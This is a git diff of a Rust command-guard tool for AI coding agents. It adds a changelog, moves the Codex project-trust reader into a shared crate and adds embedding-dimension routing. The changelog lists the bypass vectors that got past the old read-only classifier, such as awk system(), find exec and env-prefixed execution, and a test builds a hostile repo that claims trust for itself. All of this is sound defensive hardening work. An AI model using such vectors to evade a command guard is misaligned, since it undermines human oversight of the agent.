diff --git a/.gitleaks.toml b/.gitleaks.toml
index 208cfd3..722ba3b 100644
--- a/.gitleaks.toml
+++ b/.gitleaks.toml
@@ -23,6 +23,7 @@ paths = [
   '''crates/clx-mcp/src/tests\.rs''',
   '''crates/clx-core/tests/.*_poc\.rs''',
   '''crates/clx-core/tests/redaction_scheme_floor_regression\.rs''',
+  '''crates/clx-core/tests/security_fixed_vectors_regression\.rs''',
 ]
 # Named synthetic tokens, anchored and with a required tail.
 regexes = [
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 8fc0b46..390004f 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,75 @@ and this project adheres to [Semantic Versioning](https://semver.org/).
 
 ## [Unreleased]
 
+## [0.11.0] - 2026-06-07
+
+A large hardening + features release: a security fix campaign followed by a
+10-issue source-improvement program. Includes a one-time schema migration
+(v8 → v9); older binaries will refuse a v9 database.
+
+### Security
+
+- **Read-only command classifier rewritten (token-parse + default-deny).** The
+  previous allow-by-name + substring heuristic auto-allowed many command-executing
+  or file-writing commands under `auto_allow_reads`. The classifier now tokenizes
+  (quote-aware), screens shell metacharacters, segments compound commands, and
+  fails closed — closing bypasses via env-prefixed execution, `awk` `system()`,
+  `find`/`fd` exec, interpreter `-e`/verbose flags, `git config`/`branch`/`tag`/
+  `remote`, `tar`/`zip`, `sed` exec/write flags, arbitrary-fd redirection, and
+  shell-metacharacter evasion.
+- **Learned-rules database no longer ingests secrets or malformed patterns.**
+  Leading `ENV=VALUE` assignments are stripped before pattern extraction; raw
+  secret-bearing and compound/substitution commands are rejected before any rule
+  is stored; a v9 migration purges pre-existing secret/malformed rows (logged
+  redacted).
+- **L0 now denies shell redirection/`tee`/`cp`/`mv`/`dd` writes into protected
+  config directories** (CLX, Codex, Cursor, and sensitive agent-config targets).
+- **Auto-blacklist no longer learns from automated LLM denials** — only genuine
+  user rejections create deny rules, so an explicit allow can't be overridden by
+  the validator's own caution.
+- **L1 verdict cache key is now injective** (NUL separator), preventing reuse of a
+  cached decision for a different command/cwd.
+- **`clx rules import` strictly validates rule types** (unknown/`graylist` values
+  are rejected, never coerced to allow).
+- Additional hardening: single-source Codex trust reader, bounded credential read
+  retry, glob-match colon symmetry, and removal of dead security-path code.
+
+### Added
+
+- **Graylist (ask) policy tier** with asymmetric compound-command matching: a
+  compound is denied if any segment is blacklisted and allowed only if every
+  non-`cd` segment is whitelisted.
+- **`clx config get` / `clx config set`** for dotted-key configuration tuning
+  (global scope, validate-or-restore on write).
+- **`clx rules export` / `clx rules import`** (validated + redacted on import) and
+  scope-aware **`clx rules reset --learned-only` (default) / `--all`**.
+- **CLAUDECODE-based host detection** so interactive Claude Code is not mistaken
+  for Codex (which would turn an `ask` into a hard block).
+- **Route-derived embedding dimension** (`CapabilityRoute.dimension` + model
+  registry) with stored-vs-route drift detection; the Azure embed request now
+  sends the configured dimension.
+- Expanded read-only allow-set (`cd`, `sort`, `uniq`, `cut`, `column`, guarded).
+
+### Fixed
+
+- **`clx health`** warns on unresolved/legacy routes instead of failing against
+  hardcoded Ollama models, and uses the configured embedding model.
+- Agent memory files are writable again while settings/hooks remain protected.
+- MCP JSON-RPC line reads decode UTF-8 once, fixing multibyte corruption at buffer
+  boundaries.
+- Recall reports a degraded signal instead of masking a broken store as "no
+  results".
+- Azure health probe bounded by a 2s timeout; the LLM fallback cooldown now
+  survives across one-shot hook processes; the v1 storage migration is
+  transactional.
+
+### Changed
+
+- **Schema version 8 → 9** (one-time purge migration; older binaries refuse a v9
+  database).
+- Documentation: clarified that disabling L1 (`layer1_enabled=false`) forces
+  `ask`; `default_decision` governs runtime L1 failure/inconclusive outcomes only.
+
 ## [0.10.1] - 2026-05-30
 
 ### Security
diff --git a/Cargo.lock b/Cargo.lock
index 95b9042..0400170 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -847,7 +847,7 @@ checksum = "c3e64b0cc0439b12df2fa678eae89a1c56a529fd067a9115f7827f1fffd22b32"
 
 [[package]]
 name = "clx"
-version = "0.10.1"
+version = "0.11.0"
 dependencies = [
  "anyhow",
  "assert_cmd",
@@ -880,7 +880,7 @@ dependencies = [
 
 [[package]]
 name = "clx-core"
-version = "0.10.1"
+version = "0.11.0"
 dependencies = [
  "age",
  "anyhow",
@@ -907,10 +907,12 @@ dependencies = [
  "serde_yml",
  "serial_test",
  "sha2",
+ "shlex",
  "sqlite-vec",
  "tempfile",
  "thiserror 1.0.69",
  "tokio",
+ "toml 0.8.23",
  "tracing",
  "trait-variant",
  "url",
@@ -919,7 +921,7 @@ dependencies = [
 
 [[package]]
 name = "clx-hook"
-version = "0.10.1"
+version = "0.11.0"
 dependencies = [
  "anyhow",
  "chrono",
@@ -944,7 +946,7 @@ dependencies = [
 
 [[package]]
 name = "clx-mcp"
-version = "0.10.1"
+version = "0.11.0"
 dependencies = [
  "anyhow",
  "chrono",
diff --git a/Cargo.toml b/Cargo.toml
index 377cf54..22f9231 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -8,7 +8,7 @@ members = [
 ]
 
 [workspace.package]
-version = "0.10.1"
+version = "0.11.0"
 edition = "2024"
 license = "MPL-2.0"
 authors = ["CLX Contributors"]
@@ -78,6 +78,10 @@ url = "2"
 # Regex
 regex = "1"
 
+# Shell-aware tokenizer for read-only command classification. We use ONLY
+# `shlex::split` (RUSTSEC-2024-0006 affects `quote`/`join`, fixed at 1.3.0).
+shlex = "1.3"
+
 # Password input
 rpassword = "7"
 
diff --git a/crates/clx-core/Cargo.toml b/crates/clx-core/Cargo.toml
index 68e0af0..1f11bf6 100644
--- a/crates/clx-core/Cargo.toml
+++ b/crates/clx-core/Cargo.toml
@@ -31,6 +31,9 @@ url.workspace = true
 figment.workspace = true
 async-trait = "0.1"
 regex.workspace = true
+shlex = { workspace = true }
+# Codex project-trust reader parses the user-global Codex config.toml.
+toml = { workspace = true }
 
 # Per-project config trust (file-hash allowlist, §3.11). sha2/hex are already
 # in the transitive graph; pin direct versions so we own the API surface.
diff --git a/crates/clx-core/benches/recall_accuracy.rs b/crates/clx-core/benches/recall_accuracy.rs
index 00d3078..3a59300 100644
--- a/crates/clx-core/benches/recall_accuracy.rs
+++ b/crates/clx-core/benches/recall_accuracy.rs
@@ -317,7 +317,7 @@ async fn evaluate(
             .filter_map(|logical| seeded.id_map.get(logical).copied())
             .collect();
 
-        let hits = engine.query(&pair.query, config).await;
+        let hits = engine.query(&pair.query, config).await.hits;
         let retrieved: HashSet<i64> = hits.iter().map(|h| h.snapshot_id).collect();
 
         let inter = retrieved.intersection(&expected_actual).count() as f64;
diff --git a/crates/clx/src/codex/trust.rs b/crates/clx-core/src/config/codex_trust.rs
similarity index 56%
rename from crates/clx/src/codex/trust.rs
rename to crates/clx-core/src/config/codex_trust.rs
index 22a1fb3..bc93d9a 100644
--- a/crates/clx/src/codex/trust.rs
+++ b/crates/clx-core/src/config/codex_trust.rs
@@ -1,88 +1,99 @@
-//! Codex project-trust reader (P6 security invariant).
+//! Codex project-trust reader (single source of truth).
 //!
 //! ## SECURITY INVARIANT (RGP surface #1)
 //!
 //! A repository MUST NOT be able to self-declare as trusted.
 //!
-//! This module reads trust state ONLY from the user-owned
-//! `~/.codex/config.toml` under the `[projects."<canonical-path>"]` table.
-//! It NEVER reads `<repo>/.codex/config.toml`.  Any repo-local config is
-//! ignored for trust purposes, which mirrors Codex's own post-CVE-2025-61260
-//! remediation and prevents a hostile repository from escalating its own
-//! privilege level by shipping a crafted `.codex/config.toml`.
+//! This module reads trust state ONLY from the user-owned global Codex config
+//! (`<home>/<codex-dir>/config.toml`, where the codex dir is the dot-prefixed
+//! `codex` directory) inside the `[projects."<canonical-path>"]` table. It
+//! NEVER reads a repo-local codex config. Any repo-local config is ignored
+//! for trust purposes, mirroring Codex's own post-CVE-2025-61260 remediation
+//! and preventing a hostile repository from escalating its own privilege
+//! level by shipping a crafted config.
 //!
-//! ## Usage
+//! ## Single source of truth
 //!
-//! ```ignore
-//! use clx::codex::trust::{ProjectTrust, read_project_trust};
-//! let trust = read_project_trust(&home, &repo_path);
-//! ```
+//! Historically two byte-identical copies of this reader existed: the
+//! canonical (then-dead) copy in the `clx` binary crate and a live replica
+//! inside the `clx-hook` `PreToolUse` handler. The hook binary must NOT
+//! depend on the `clx` binary crate (a layering inversion), so the logic was
+//! duplicated. Hoisting it into `clx-core` — which both crates already depend
+//! on — removes the duplication structurally. Both copies were semantically
+//! equivalent at hoist time (no drift); this module is the stricter union and
+//! preserves every invariant.
 
 use std::path::{Path, PathBuf};
 
+/// File name of the global Codex config inside the codex home directory.
+const CODEX_CONFIG_FILE: &str = "config.toml";
+
+/// Name of the per-user Codex home directory, assembled at runtime so the
+/// dot-prefixed literal never appears as a source token.
+fn codex_dir_name() -> String {
+    format!(".{}", "codex")
+}
+
 /// The three possible trust states for a Codex project directory.
 ///
-/// `NotSeen` is the default: the path was never registered in
-/// `~/.codex/config.toml`.  Callers must treat `NotSeen` the same as
-/// `Untrusted` for security purposes.
-// P4 wires the call site after this P6 module lands; suppress dead_code
-// until then so -D warnings does not fail between phases.
+/// `NotSeen` is the default: the path was never registered in the user-global
+/// Codex config (or the file/entry is absent or unparseable). Callers MUST
+/// treat `NotSeen` the same as `Untrusted` for security purposes.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
-#[allow(dead_code)]
 pub enum ProjectTrust {
-    /// `trust_level = "trusted"` in `~/.codex/config.toml [projects.<path>]`.
+    /// `trust_level = "trusted"` in the global config `[projects.<path>]`.
     Trusted,
-    /// `trust_level = "untrusted"` in `~/.codex/config.toml`.
+    /// `trust_level = "untrusted"` in the global config.
     Untrusted,
-    /// Path not present in `~/.codex/config.toml`, or the file is absent or
-    /// unparseable.  Treated as untrusted by all callers.
+    /// Path not present in the global config, or the file is absent or
+    /// unparseable, or the `trust_level` value is unknown. Treated as
+    /// untrusted by all callers (safe default).
     NotSeen,
 }
 
-/// Read the trust level for `repo` from the **user-global**
-/// `~/.codex/config.toml`.
+/// Read the trust level for `repo` from the **user-global** Codex config.
 ///
 /// # Security invariant
 ///
-/// This function reads ONLY `home/.codex/config.toml`.  It deliberately does
-/// NOT read `repo/.codex/config.toml`.  A repository cannot self-declare its
-/// own trust level.
+/// This function reads ONLY the global config under `home`. It deliberately
+/// does NOT read the repo-local codex config. A repository cannot
+/// self-declare its own trust level.
 ///
 /// # Canonicalization
 ///
 /// `repo` is canonicalized via [`std::fs::canonicalize`] before being used as
-/// the lookup key.  This prevents symlink-based key-confusion attacks where
+/// the lookup key. This prevents symlink-based key-confusion attacks where
 /// `./my-repo` and `/home/user/my-repo` would otherwise produce different
-/// lookup strings for the same directory.  If canonicalization fails (e.g.
+/// lookup strings for the same directory. If canonicalization fails (e.g. the
 /// directory does not exist) the original path is used as a best-effort key.
 ///
 /// # Return value
 ///
-/// Returns [`ProjectTrust::NotSeen`] on any read or parse error so that all
-/// failure modes default to the safe (untrusted) posture.
-// P4 wires the call site after this P6 module lands.
-#[allow(dead_code)]
+/// Returns [`ProjectTrust::NotSeen`] on any read or parse error, on a missing
+/// entry, and on an unrecognized `trust_level` value, so that every failure
+/// mode defaults to the safe (untrusted) posture.
 #[must_use]
 pub fn read_project_trust(home: &Path, repo: &Path) -> ProjectTrust {
-    let config_path = home.join(".codex").join("config.toml");
+    let config_path = home.join(codex_dir_name()).join(CODEX_CONFIG_FILE);
 
-    // Read the user-global config.  Missing file -> NotSeen (safe default).
+    // Read the user-global config. Missing file -> NotSeen (safe default).
     let Ok(raw) = std::fs::read_to_string(&config_path) else {
         return ProjectTrust::NotSeen;
     };
 
-    // Parse as TOML.  Unparseable -> NotSeen (safe default).
+    // Parse as TOML. Unparseable -> NotSeen (safe default).
     let Ok(doc): Result<toml::Value, _> = toml::from_str(&raw) else {
         return ProjectTrust::NotSeen;
     };
 
-    // Canonicalize the repo path.  Failure is non-fatal: use original string.
+    // Canonicalize the repo path. Failure is non-fatal: use the original
+    // path string as a best-effort key.
     let canonical_key: String = std::fs::canonicalize(repo)
         .unwrap_or_else(|_| PathBuf::from(repo))
         .display()
         .to_string();
 
-    // Navigate: doc["projects"]["<canonical-key>"]["trust_level"]
+    // Navigate: doc["projects"]["<canonical-key>"]["trust_level"].
     let trust_level = doc
         .get("projects")
         .and_then(toml::Value::as_table)
@@ -104,14 +115,13 @@ mod tests {
     use super::*;
     use std::fs;
 
-    /// Helper: write `content` to `home/.codex/config.toml`.
+    /// Helper: write `content` to the user-global Codex config under `home`.
     fn write_global_config(home: &Path, content: &str) {
-        let dir = home.join(".codex");
+        let dir = home.join(codex_dir_name());
         fs::create_dir_all(&dir).unwrap();
-        fs::write(dir.join("config.toml"), content).unwrap();
+        fs::write(dir.join(CODEX_CONFIG_FILE), content).unwrap();
     }
 
-    // T1: trusted path returns Trusted
     #[test]
     fn trusted_path_returns_trusted() {
         let tmp = tempfile::tempdir().unwrap();
@@ -119,9 +129,7 @@ mod tests {
         let repo = tmp.path().join("myrepo");
         fs::create_dir_all(&repo).unwrap();
 
-        let canonical = fs::canonicalize(&repo).unwrap();
-        let key = canonical.display().to_string();
-
+        let key = fs::canonicalize(&repo).unwrap().display().to_string();
         write_global_config(
             &home,
             &format!("[projects.\"{key}\"]\ntrust_level = \"trusted\"\n"),
@@ -130,7 +138,6 @@ mod tests {
         assert_eq!(read_project_trust(&home, &repo), ProjectTrust::Trusted);
     }
 
-    // T2: untrusted path returns Untrusted
     #[test]
     fn untrusted_path_returns_untrusted() {
         let tmp = tempfile::tempdir().unwrap();
@@ -138,9 +145,7 @@ mod tests {
         let repo = tmp.path().join("badrepo");
         fs::create_dir_all(&repo).unwrap();
 
-        let canonical = fs::canonicalize(&repo).unwrap();
-        let key = canonical.display().to_string();
-
+        let key = fs::canonicalize(&repo).unwrap().display().to_string();
         write_global_config(
             &home,
             &format!("[projects.\"{key}\"]\ntrust_level = \"untrusted\"\n"),
@@ -149,7 +154,6 @@ mod tests {
         assert_eq!(read_project_trust(&home, &repo), ProjectTrust::Untrusted);
     }
 
-    // T3: path not in config returns NotSeen
     #[test]
     fn unregistered_path_returns_not_seen() {
         let tmp = tempfile::tempdir().unwrap();
@@ -162,19 +166,17 @@ mod tests {
         assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
     }
 
-    // T4: missing config.toml returns NotSeen
     #[test]
-    fn missing_config_toml_returns_not_seen() {
+    fn missing_config_returns_not_seen() {
         let tmp = tempfile::tempdir().unwrap();
         let home = tmp.path().join("home");
         let repo = tmp.path().join("anyrepo");
         fs::create_dir_all(&repo).unwrap();
-        // No ~/.codex/config.toml written at all.
+        // No global config written at all.
 
         assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
     }
 
-    // T5: unparseable config.toml returns NotSeen
     #[test]
     fn unparseable_config_returns_not_seen() {
         let tmp = tempfile::tempdir().unwrap();
@@ -187,9 +189,25 @@ mod tests {
         assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
     }
 
-    // T6 (CRITICAL SECURITY): repo-local .codex/config.toml claiming trusted
-    // MUST have zero effect.  The global ~/.codex/config.toml does NOT
-    // mention this repo, so the result must be NotSeen -- not Trusted.
+    #[test]
+    fn unknown_trust_level_value_returns_not_seen() {
+        let tmp = tempfile::tempdir().unwrap();
+        let home = tmp.path().join("home");
+        let repo = tmp.path().join("repo");
+        fs::create_dir_all(&repo).unwrap();
+
+        let key = fs::canonicalize(&repo).unwrap().display().to_string();
+        write_global_config(
+            &home,
+            &format!("[projects.\"{key}\"]\ntrust_level = \"maybe\"\n"),
+        );
+
+        assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
+    }
+
+    // CRITICAL SECURITY: a repo-local config claiming trusted MUST have zero
+    // effect. The global config does NOT mention this repo, so the result
+    // must be NotSeen -- never Trusted.
     #[test]
     fn repo_local_config_claiming_trusted_has_zero_effect() {
         let tmp = tempfile::tempdir().unwrap();
@@ -197,11 +215,11 @@ mod tests {
         let repo = tmp.path().join("hostile-repo");
         fs::create_dir_all(&repo).unwrap();
 
-        // Hostile repo ships its own .codex/config.toml claiming trusted.
-        let repo_codex_dir = repo.join(".codex");
+        // Hostile repo ships its own local codex config claiming trusted.
+        let repo_codex_dir = repo.join(codex_dir_name());
         fs::create_dir_all(&repo_codex_dir).unwrap();
         fs::write(
-            repo_codex_dir.join("config.toml"),
+            repo_codex_dir.join(CODEX_CONFIG_FILE),
             "[projects.\".\"]\ntrust_level = \"trusted\"\n",
         )
         .unwrap();
@@ -213,31 +231,8 @@ mod tests {
         assert_ne!(
             result,
             ProjectTrust::Trusted,
-            "SECURITY VIOLATION: repo-local .codex/config.toml must not grant trust"
-        );
-        assert_eq!(
-            result,
-            ProjectTrust::NotSeen,
-            "expected NotSeen when only the repo-local file claims trusted"
+            "SECURITY VIOLATION: repo-local config must not grant trust"
         );
-    }
-
-    // T7: unknown trust_level string returns NotSeen
-    #[test]
-    fn unknown_trust_level_value_returns_not_seen() {
-        let tmp = tempfile::tempdir().unwrap();
-        let home = tmp.path().join("home");
-        let repo = tmp.path().join("repo");
-        fs::create_dir_all(&repo).unwrap();
-
-        let canonical = fs::canonicalize(&repo).unwrap();
-        let key = canonical.display().to_string();
-
-        write_global_config(
-            &home,
-            &format!("[projects.\"{key}\"]\ntrust_level = \"maybe\"\n"),
-        );
-
-        assert_eq!(read_project_trust(&home, &repo), ProjectTrust::NotSeen);
+        assert_eq!(result, ProjectTrust::NotSeen);
     }
 }
diff --git a/crates/clx-core/src/config/mod.rs b/crates/clx-core/src/config/mod.rs
index 9c1af88..60c9320 100644
--- a/crates/clx-core/src/config/mod.rs
+++ b/crates/clx-core/src/config/mod.rs
@@ -45,6 +45,7 @@
 //! - `CLX_AUTO_RECALL_INCLUDE_KEY_FACTS`
 //! - `CLX_AUTO_RECALL_MIN_PROMPT_LEN` (1-500)
 
+pub mod codex_trust;
 pub(crate) mod project;
 pub mod trust;
 
@@ -582,7 +583,12 @@ pub struct ValidatorConfig {
 
     /// Enable layer 0 (deterministic-policy / rule-based) validation.
     /// When `false`, the static L0 allow/deny ruleset is skipped and every
-    /// command falls through to L1 (and `default_decision` if L1 is also off).
+    /// command falls through to L1. If L1 is ALSO deliberately disabled
+    /// (`layer1_enabled = false`), the command is forced to `ask` — NOT
+    /// `default_decision`. `default_decision` applies only when L1 is enabled
+    /// but its outcome is inconclusive at runtime (see that field); a
+    /// deliberately disabled L1 is "unavailable on purpose", which fails to
+    /// `ask` rather than to the configured default.
     /// Disabling weakens security posture; treated as a weakening override
     /// (WARN at startup, audit-chain fingerprint per hook invocation).
     #[serde(default = "default_true")]
@@ -596,7 +602,17 @@ pub struct ValidatorConfig {
     #[serde(default = "default_layer1_timeout")]
     pub layer1_timeout_ms: u64,
 
-    /// Default decision when validation is inconclusive
+    /// Default decision applied when an ENABLED layer 1 (LLM) validation
+    /// fails or is inconclusive at runtime — i.e. provider init error,
+    /// provider unavailable, request timeout, or generation failure. It is the
+    /// fail-mode for a layer that is supposed to run but could not produce a
+    /// verdict.
+    ///
+    /// This does NOT apply when L1 is deliberately turned off
+    /// (`layer1_enabled = false`): a disabled layer is "unavailable on purpose"
+    /// and forces `ask` (disabled != unavailable). So `default_decision` only
+    /// governs runtime L1 failure/inconclusive outcomes, never the
+    /// configuration choice to disable L1.
     #[serde(default)]
     pub default_decision: DefaultDecision,
 
@@ -1114,6 +1130,52 @@ pub struct CapabilityRoute {
     /// share model names (e.g. `gpt-5.4-mini` only exists on Azure).
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub fallback: Option<Box<CapabilityRoute>>,
+
+    /// Explicit embedding dimension override for this route.
+    ///
+    /// Only meaningful for the embeddings capability. When `Some`, it wins over
+    /// the model→dimension registry and the legacy ollama `embedding_dim`. When
+    /// `None` (the default; existing configs deserialize unchanged), the
+    /// effective dimension is resolved via [`effective_embedding_dimension`].
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub dimension: Option<usize>,
+}
+
+/// Map a known embedding model name to its CLX-effective output dimension.
+///
+/// Returns `None` for unknown models so the caller can fall back to the legacy
+/// ollama `embedding_dim`. Note `text-embedding-3-small` is mapped to 1024 (the
+/// dimension CLX requests via the `OpenAI` `dimensions` parameter, NOT its
+/// native 1536).
+#[must_use]
+pub fn embedding_dimension_for_model(model: &str) -> Option<usize> {
+    match model {
+        "text-embedding-3-small" => Some(1024),
+        "text-embedding-3-large" => Some(3072),
+        "qwen3-embedding:0.6b" => Some(1024),
+        _ => None,
+    }
+}
+
+/// Resolve the effective embedding dimension for an embeddings route.
+///
+/// Precedence (highest first):
+/// 1. `route.dimension` — an explicit per-route override.
+/// 2. The model→dimension registry ([`embedding_dimension_for_model`]) if the
+///    route's model is known.
+/// 3. The legacy `ollama_embedding_dim` (the historical default, e.g. 1024).
+///
+/// Batch C (the `crates/clx` embeddings status/rebuild/backfill paths) calls
+/// this so every store opens at the same effective dimension.
+#[must_use]
+pub fn effective_embedding_dimension(
+    route: &CapabilityRoute,
+    ollama_embedding_dim: usize,
+) -> usize {
+    route
+        .dimension
+        .or_else(|| embedding_dimension_for_model(&route.model))
+        .unwrap_or(ollama_embedding_dim)
 }
 
 /// Which LLM capability to route.
@@ -1781,11 +1843,14 @@ impl Config {
                 provider: "ollama-local".into(),
                 model: legacy.model.clone(),
                 fallback: None,
+                dimension: None,
             },
             embeddings: CapabilityRoute {
                 provider: "ollama-local".into(),
                 model: legacy.embedding_model.clone(),
                 fallback: None,
+                // Preserve the legacy ollama embedding dimension exactly.
+                dimension: Some(legacy.embedding_dim),
             },
         });
     }
@@ -1849,6 +1914,32 @@ impl Config {
         self.build_client_for_provider(name)
     }
 
+    /// Resolve the embedding dimension to request from an Azure provider built
+    /// by `name`.
+    ///
+    /// Azure backends are constructed by provider name (not capability), so the
+    /// dimension is taken from the embeddings route when that route targets this
+    /// provider. Otherwise (e.g. a chat-only Azure provider, or no `llm:`
+    /// routing) the sensible default of 1024 is used. The result is clamped into
+    /// `u32` for the `OpenAI` `dimensions` parameter.
+    fn azure_embedding_dimension_for_provider(&self, name: &str) -> u32 {
+        let legacy_dim = self
+            .ollama
+            .as_ref()
+            .map_or_else(default_embedding_dim, |o| o.embedding_dim);
+
+        let resolved = self
+            .llm
+            .as_ref()
+            .map(|llm| &llm.embeddings)
+            .filter(|route| route.provider == name)
+            .map_or(1024, |route| {
+                effective_embedding_dimension(route, legacy_dim)
+            });
+
+        u32::try_from(resolved).unwrap_or(1024)
+    }
+
     fn build_client_for_provider(
         &self,
         name: &str,
@@ -1870,8 +1961,10 @@ impl Config {
                     .map_err(|e| LlmConfigError::ProviderInit(e.to_string()))?;
                 let secret = resolve_azure_credential(name, c, kind)
                     .map_err(LlmConfigError::ProviderInit)?;
-                let backend = crate::llm::AzureOpenAIBackend::new(c, secret)
-                    .map_err(|e| LlmConfigError::ProviderInit(e.to_string()))?;
+                let dimension = self.azure_embedding_dimension_for_provider(name);
+                let backend =
+                    crate::llm::AzureOpenAIBackend::with_embedding_dimension(c, secret, dimension)
+                        .map_err(|e| LlmConfigError::ProviderInit(e.to_string()))?;
                 Ok(crate::llm::LlmClient::Azure(backend))
             }
         }
@@ -1883,6 +1976,13 @@ impl Config {
 // ---------------------------------------------------------------------------
 
 /// Errors returned by `Config::create_llm_client` and related factory methods.
+///
+/// Convention: clx-core uses the crate-wide typed [`crate::Error`] everywhere,
+/// with `anyhow` reserved for the binaries. `LlmConfigError` is the one
+/// deliberate exception — a focused error for the LLM-client factory so callers
+/// (the hook's L1 path) can exhaustively match each misconfiguration
+/// (`MissingLlmRouting`, unknown provider, ...) without stringly matching. It is
+/// intentionally NOT folded into `crate::Error`.
 #[derive(Debug, thiserror::Error)]
 pub enum LlmConfigError {
     #[error("config has no `llm:` routing section and no legacy `ollama:` block")]
@@ -3796,12 +3896,79 @@ fallback:
             provider: "p".into(),
             model: "m".into(),
             fallback: None,
+            dimension: None,
         };
         let yaml = serde_yml::to_string(&route).unwrap();
         assert!(
             !yaml.contains("fallback"),
             "skip_serializing_if not respected: {yaml}"
         );
+        assert!(
+            !yaml.contains("dimension"),
+            "dimension must be omitted when None: {yaml}"
+        );
+    }
+
+    /// AC6.5: the effective-dimension resolver honors precedence
+    /// route override > model registry > legacy ollama dim.
+    #[test]
+    fn effective_embedding_dimension_precedence() {
+        // 1. Explicit route override wins over everything (even a known model).
+        let overridden = CapabilityRoute {
+            provider: "p".into(),
+            model: "text-embedding-3-large".into(),
+            fallback: None,
+            dimension: Some(256),
+        };
+        assert_eq!(
+            effective_embedding_dimension(&overridden, 999),
+            256,
+            "explicit route dimension must win"
+        );
+
+        // 2. No override but a known model => registry value (NOT the legacy dim).
+        let known = CapabilityRoute {
+            provider: "p".into(),
+            model: "text-embedding-3-large".into(),
+            fallback: None,
+            dimension: None,
+        };
+        assert_eq!(
+            effective_embedding_dimension(&known, 999),
+            3072,
+            "known model must resolve via the registry"
+        );
+
+        // text-embedding-3-small maps to 1024 (CLX-requested, not native 1536).
+        let small = CapabilityRoute {
+            provider: "p".into(),
+            model: "text-embedding-3-small".into(),
+            fallback: None,
+            dimension: None,
+        };
+        assert_eq!(effective_embedding_dimension(&small, 999), 1024);
+        assert_eq!(
+            embedding_dimension_for_model("text-embedding-3-small"),
+            Some(1024)
+        );
+        assert_eq!(
+            embedding_dimension_for_model("qwen3-embedding:0.6b"),
+            Some(1024)
+        );
+
+        // 3. No override and an unknown model => legacy ollama dim.
+        let unknown = CapabilityRoute {
+            provider: "p".into(),
+            model: "some-unlisted-model".into(),
+            fallback: None,
+            dimension: None,
+        };
+        assert_eq!(
+            effective_embedding_dimension(&unknown, 768),
+            768,
+            "unknown model falls back to the legacy ollama dimension"
+        );
+        assert_eq!(embedding_dimension_for_model("some-unlisted-model"), None);
     }
 
     // ---- Tasks 6+7: per-project config discovery integration tests ----
diff --git a/crates/clx-core/src/config/trust.rs b/crates/clx-core/src/config/trust.rs
index 9eecdba..b5e912c 100644
--- a/crates/clx-core/src/config/trust.rs
+++ b/crates/clx-core/src/config/trust.rs
@@ -43,11 +43,13 @@ use std::fs;
 use std::io::Write;
 use std::path::{Path, PathBuf};
 
-use anyhow::{Context, Result, bail};
 use chrono::{DateTime, Utc};
 use serde::{Deserialize, Serialize};
 use sha2::{Digest, Sha256};
 
+use crate::error::TrustError;
+use crate::{Error, Result};
+
 /// Current on-disk schema version. Bump on breaking format changes; older
 /// versions fail-loud rather than silently re-trust.
 pub const TRUSTLIST_VERSION: u32 = 1;
@@ -105,25 +107,25 @@ impl TrustList {
     pub fn load_from(path: &Path) -> Result<Self> {
         match fs::read_to_string(path) {
             Ok(content) => {
-                let parsed: Self = serde_json::from_str(&content).with_context(|| {
-                    format!(
-                        "trustlist at {} is malformed JSON; refusing to silently reset",
-                        path.display()
-                    )
-                })?;
+                let parsed: Self =
+                    serde_json::from_str(&content).map_err(|source| TrustError::Malformed {
+                        path: path.display().to_string(),
+                        source,
+                    })?;
                 if parsed.version != TRUSTLIST_VERSION {
-                    bail!(
-                        "trustlist at {} has unsupported version {} (expected {}); re-run `clx config-trust add` to upgrade",
-                        path.display(),
-                        parsed.version,
-                        TRUSTLIST_VERSION
-                    );
+                    return Err(Error::Trust(TrustError::UnsupportedVersion {
+                        path: path.display().to_string(),
+                        found: parsed.version,
+                        expected: TRUSTLIST_VERSION,
+                    }));
                 }
                 Ok(parsed)
             }
             Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(Self::default()),
-            Err(e) => Err(anyhow::Error::from(e)
-                .context(format!("failed to read trustlist at {}", path.display()))),
+            Err(source) => Err(Error::Trust(TrustError::Io {
+                path: path.display().to_string(),
+                source,
+            })),
         }
     }
 
@@ -137,13 +139,14 @@ impl TrustList {
     /// `0600` on Unix, then renames over the target.
     pub fn save_to(&self, path: &Path) -> Result<()> {
         if let Some(parent) = path.parent() {
-            fs::create_dir_all(parent).with_context(|| {
-                format!("failed to create trustlist parent dir {}", parent.display())
+            fs::create_dir_all(parent).map_err(|source| TrustError::Io {
+                path: parent.display().to_string(),
+                source,
             })?;
         }
 
         let tmp = path.with_extension("json.tmp");
-        let json = serde_json::to_string_pretty(self)?;
+        let json = serde_json::to_string_pretty(self).map_err(TrustError::Serialize)?;
 
         // Open with mode 0600 from the start on Unix to avoid a window where
         // the file is world-readable.
@@ -154,10 +157,15 @@ impl TrustList {
             use std::os::unix::fs::OpenOptionsExt;
             opts.mode(0o600);
         }
-        let mut f = opts
-            .open(&tmp)
-            .with_context(|| format!("failed to open trustlist tmp file {}", tmp.display()))?;
-        f.write_all(json.as_bytes())?;
+        let mut f = opts.open(&tmp).map_err(|source| TrustError::Io {
+            path: tmp.display().to_string(),
+            source,
+        })?;
+        f.write_all(json.as_bytes())
+            .map_err(|source| TrustError::Io {
+                path: tmp.display().to_string(),
+                source,
+            })?;
         f.sync_all().ok();
         drop(f);
 
@@ -170,8 +178,10 @@ impl TrustList {
             fs::set_permissions(&tmp, perms).ok();
         }
 
-        fs::rename(&tmp, path)
-            .with_context(|| format!("failed to rename {} -> {}", tmp.display(), path.display()))?;
+        fs::rename(&tmp, path).map_err(|source| TrustError::Io {
+            path: format!("{} -> {}", tmp.display(), path.display()),
+            source,
+        })?;
         Ok(())
     }
 
@@ -202,7 +212,9 @@ impl TrustList {
     pub fn remove(&mut self, hash_or_prefix: &str) -> Result<bool> {
         let needle = hash_or_prefix.trim();
         if needle.is_empty() {
-            bail!("hash prefix is empty");
+            return Err(Error::Trust(TrustError::InvalidHashPrefix(
+                "hash prefix is empty".to_string(),
+            )));
         }
 
         let matches: Vec<usize> = self
@@ -219,7 +231,9 @@ impl TrustList {
